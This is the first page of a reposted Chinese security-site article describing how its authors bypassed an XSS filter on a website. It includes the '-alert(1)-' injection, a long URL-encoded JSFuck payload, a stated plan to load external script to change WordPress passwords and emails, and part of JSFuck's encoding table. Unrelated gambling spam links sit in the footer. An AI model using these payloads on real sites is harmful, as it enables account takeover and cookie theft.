歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

看我如何繞過像PRO這樣的XSS過濾器(XSS高級方法)

來源:本站整理 作者:佚名 時間:2019-11-16 TAG: 我要投稿

JavaScript代碼中如果存在代碼注入漏洞的話,那確實是一個令人頭疼的問題,由于這個項目并不是我們為企業環境做的滲透測試項目,因此我們可以直接將技術細節公布給大家。
簡而言之,我們在某網站上發現了一個安全漏洞,經過一段時間的代碼分析之后,我們成功發現了一個存在XSS漏洞的節點:
http://website.com/dir/subdir
在該節點的JavaScript代碼中,有如下代碼:
function("/DIR/SUBDIR",params);
使用Burp Suite掃描之后,我們發現在URL結尾添加“-alert(1)-”(http://website.com/dir/subdir/”-alert(1)-”)將能夠反射XSS,瀏覽器會告訴我們“unable to find function ALERT(1)”:

那么接下來,我們需要測試服務器到底過濾掉了什么,比如說是“”、“//”、“\”還是“.”。
尋找可用的Payload
我們也尋找到了一些解決方案,而且都跟jsfuck.com有關。

當然了,在這個站點我們也可以執行一次“alert(1)”,但這只是低危的XSS,我們想要將該漏洞提升為高;驀乐芈┒。為了實現這個目標,我們將需要加載一個外部JS文件,并且能夠在不需要任何用戶交互的情況下執行任意Web行為。
下圖顯示的是一個WordPress Payload,我們的目標是在目標網站中加載要一個外部JS文件,并修改賬號密碼以及郵箱:

制作JsFuck Payload,在JsFuck代碼中,簡單地“alert(1)”會被轉換為:
"-%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D%5B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%5D)%5B!!%5B%5D%2B!!%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!!%5B%5D%2B!!%5B%5D%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!!%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D)()(%2B!!%5B%5D)-"
如果我想要實現“alert(document.cookie)”,那么整個JsFuck代碼估計要到13000多個字符了。我發現,只要字符超過2500-2700個之后,目標站點的服務器就會返回“錯誤400”。
接下來,我們研究一下JsFuck的工作機制:
const SIMPLE = {
        'false':      '![]',
        'true':       '!0',
        'undefined':  '0[0]',
        'NaN':        '+[!0]',
        'Infinity':   '+(+!0+(!0+[])[!0+!0+!0]+[+!0]+[0]+[0]+[0])' // +"1e1000"
      };
    const CONSTRUCTORS = {

[1] [2] [3]  下一頁

【聲明】:黑吧安全網(http://www.zjtpzs.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        神秘东方电子游艺 山西快乐10分走势图双 上证指数什么意思 推倒胡麻将口诀 山西十一选五的走势图乐彩网 内蒙古新11选5开 足球比分007 福利彩票深圳风采开 篮球nba比分直播 属牛的吉祥数字是什么 武汉麻将规则 北京快乐8是不是真的 3d开奖号试机号 玩麻将的技巧高手 全民欢乐捕鱼千炮版 重庆麻将清一色怎么打 p3试机号码牛彩网